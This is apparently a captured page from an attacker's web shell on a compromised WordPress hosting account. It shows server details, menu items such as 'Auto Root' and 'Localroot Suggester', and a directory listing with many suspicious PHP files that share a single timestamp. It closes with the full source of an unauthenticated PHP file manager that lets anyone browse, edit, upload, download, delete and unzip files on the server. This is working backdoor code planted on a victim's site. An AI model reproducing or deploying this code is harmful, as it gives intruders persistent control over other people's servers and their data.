Linux premium117.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 162.0.229.113 & Your IP : 216.73.216.135
Domains :
Cant Read [ /etc/named.conf ]
User : eblama1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
eblama1 /
mintawon.farm /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2023-04-12 20:00
296b5
[ DIR ]
dr-xr-xr-x
2026-03-25 03:45
a3d59b
[ DIR ]
drwxr-xr-x
2026-03-28 02:14
cgi-bin
[ DIR ]
drwxr-xr-x
2023-04-05 01:20
wp-admin
[ DIR ]
drwxr-xr-x
2026-03-25 20:08
wp-content
[ DIR ]
drwxr-xr-x
2026-04-05 15:51
wp-includes
[ DIR ]
drwxr-xr-x
2026-03-25 03:45
.hcflag
30
B
-rw-r--r--
2024-11-08 09:47
.htaccess
1.13
KB
-r-xr-xr-x
2023-12-07 03:45
.htaccess.bk
2.57
KB
-rw-r--r--
2023-04-08 10:15
1index.php
336
B
-rw-r--r--
2026-03-24 09:11
V2_xml.php
7.99
KB
-rw-r--r--
2026-03-24 09:11
as.php
63.18
KB
-rw-r--r--
2026-03-24 09:11
bnm.php
77.88
KB
-rw-r--r--
2026-03-24 09:11
cc13.php
152.92
KB
-rw-r--r--
2026-03-24 09:11
ccs.php
705.06
KB
-rw-r--r--
2026-03-24 09:11
dass.php
26.19
KB
-rw-r--r--
2026-03-24 09:11
db.php
6.99
KB
-rw-r--r--
2026-03-24 09:11
error_log
701.21
KB
-rw-r--r--
2026-04-05 15:51
img.php
1.21
KB
-rw-r--r--
2026-03-24 09:11
index.php0
625.97
KB
-rw-r--r--
2024-01-12 03:45
less.php
7.23
KB
-rw-r--r--
2026-03-24 09:11
license.txt
19.44
KB
-rw-r--r--
2025-12-03 04:23
radio.php
22.06
KB
-rw-r--r--
2026-03-24 09:11
readme.html
7.25
KB
-rw-r--r--
2026-03-23 05:47
robots.txt
363
B
-r--r--r--
2023-10-27 03:45
wp-activate.php
7.18
KB
-rw-r--r--
2025-12-03 04:23
wp-blog-header.php
351
B
-rw-r--r--
2023-04-05 01:22
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-08-09 04:08
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-03 04:23
wp-config.php
3.82
KB
-rw-r--r--
2026-04-04 20:08
wp-cron.php
5.49
KB
-rw-r--r--
2024-11-13 10:58
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-03 04:23
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 03:47
wp-login.php
50.23
KB
-rw-r--r--
2025-12-03 04:23
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-03 04:23
wp-settings.php
30.33
KB
-rw-r--r--
2025-12-03 04:23
wp-signup.php
33.71
KB
-rw-r--r--
2025-04-16 03:43
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-03 04:23
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-16 03:43
xy.php
23.77
KB
-rw-r--r--
2026-03-24 09:11
Save
Rename
<?php $path = realpath($_GET['p'] ?? getcwd()); if (!$path || !is_dir($path)) die("Invalid path"); // Delete if (isset($_GET['delete'])) { $target = $path . '/' . basename($_GET['delete']); is_dir($target) ? rmdir($target) : unlink($target); header("Location: ?p=" . urlencode($path)); exit; } // Download if (isset($_GET['download'])) { $file = $path . '/' . basename($_GET['download']); if (is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } // Rename if (isset($_POST['rename_old'], $_POST['rename_new'])) { rename($path . '/' . basename($_POST['rename_old']), $path . '/' . basename($_POST['rename_new'])); header("Location: ?p=" . urlencode($path)); exit; } // Zip if (isset($_GET['zip'])) { $item = $path . '/' . basename($_GET['zip']); $zipName = $item . '.zip'; $zip = new ZipArchive; if ($zip->open($zipName, ZipArchive::CREATE) === TRUE) { if (is_dir($item)) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($item)); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relative = substr($filePath, strlen($item) + 1); $zip->addFile($filePath, $relative); } } } else { $zip->addFile($item, basename($item)); } $zip->close(); } header("Location: ?p=" . urlencode($path)); exit; } // Unzip if (isset($_GET['unzip'])) { $file = $path . '/' . basename($_GET['unzip']); if (is_file($file) && pathinfo($file, PATHINFO_EXTENSION) === 'zip') { $zip = new ZipArchive; if ($zip->open($file) === TRUE) { $zip->extractTo($path); $zip->close(); } } header("Location: ?p=" . urlencode($path)); exit; } // Save edit $saved = false; if (isset($_POST['savefile'], $_POST['content'])) { $saved = file_put_contents($path . '/' . basename($_POST['savefile']), $_POST['content']) !== false; } // Upload / Create folder / Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && !$saved) { if (isset($_FILES['up'])) move_uploaded_file($_FILES['up']['tmp_name'], $path . '/' . $_FILES['up']['name']); if (!empty($_POST['folder'])) mkdir($path . '/' . basename($_POST['folder'])); if (!empty($_POST['newfile'])) file_put_contents($path . '/' . basename($_POST['newfile']), ''); header("Location: ?p=" . urlencode($path)); exit; } function formatPermissions($perms) { return substr(sprintf('%o', $perms), -4); } function formatSize($bytes) { if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB'; if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB'; if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB'; return $bytes . ' B'; } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PHP File Manager</title> <style> body { font-family: Arial; background: #1e1e1e; color: #eee; padding: 20px; } input, textarea, button { background: #2c2c2c; color: #eee; border: 1px solid #444; padding: 6px; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #444; text-align: left; } th { background: #333; } tr:nth-child(even) { background: #2a2a2a; } tr:nth-child(odd) { background: #252525; } a { color: #4ea1ff; text-decoration: none; } form.inline { display: inline; } .success { background: #2e7d32; padding: 10px; color: white; margin-top: 10px; } </style> </head> <body> <h2>📁 Current Folder: <?php echo htmlspecialchars($path); ?></h2> <form method="get"> Destination: <input type="text" name="p" value="<?php echo htmlspecialchars($path); ?>" size="80"> <button type="submit">Go</button> </form> <?php if ($path !== '/'): ?> <p><a href="?p=<?php echo urlencode(dirname($path)); ?>">⬅️ Go Up</a></p> <?php endif; ?> <?php if ($saved): ?> <div class="success">�?File saved successfully.</div> <?php endif; ?> <table> <tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr> <?php foreach (scandir($path) as $item): if ($item === '.' || $item === '..') continue; $full = $path . '/' . $item; $isFile = is_file($full); $size = $isFile ? formatSize(filesize($full)) : '-'; $perms = formatPermissions(fileperms($full)); echo "<tr><td>"; echo is_dir($full) ? "📁 <a href='?p=" . urlencode($full) . "'>$item</a>" : "📄 <a href='?p=" . urlencode($path) . "&edit=" . urlencode($item) . "'>$item</a>"; echo "</td><td>$size</td><td>$perms</td><td>"; if ($isFile) { echo "<a href='?p=" . urlencode($path) . "&edit=" . urlencode($item) . "'>Edit</a> | "; } echo "<form class='inline' method='post' style='display:inline'> <input type='hidden' name='rename_old' value='" . htmlspecialchars($item) . "'> <input type='text' name='rename_new' value='" . htmlspecialchars($item) . "' size='10'> <button>✏️ Rename</button></form> | "; if ($isFile) echo "<a href='?p=" . urlencode($path) . "&download=" . urlencode($item) . "'>⬇️ Download</a> | "; echo "<a href='?p=" . urlencode($path) . "&delete=" . urlencode($item) . "' onclick='return confirm(\"Delete $item?\")'>🗑�?Delete</a>"; if (is_file($full) && pathinfo($full, PATHINFO_EXTENSION) === 'zip') { echo " | <a href='?p=" . urlencode($path) . "&unzip=" . urlencode($item) . "'>📂 Unzip</a>"; } elseif (file_exists($full)) { echo " | <a href='?p=" . urlencode($path) . "&zip=" . urlencode($item) . "'>📦 Zip</a>"; } echo "</td></tr>"; endforeach; ?> </table> <hr> <h3>📤 Upload / Create</h3> <form method="post" enctype="multipart/form-data"> Upload: <input type="file" name="up"> | Folder: <input type="text" name="folder"> | File: <input type="text" name="newfile"> <button>Submit</button> </form> <?php if (isset($_GET['edit'])): $editFile = $path . '/' . basename($_GET['edit']); if (!is_file($editFile)) die("Invalid file"); $content = htmlspecialchars(file_get_contents($editFile)); ?> <hr> <h3>📝 Editing: <?php echo htmlspecialchars(basename($editFile)); ?></h3> <form method="post"> <textarea name="content" rows="20"><?php echo $content; ?></textarea><br> <input type="hidden" name="savefile" value="<?php echo htmlspecialchars(basename($editFile)); ?>"> <button>💾 Save</button> </form> <?php endif; ?> </body> </html>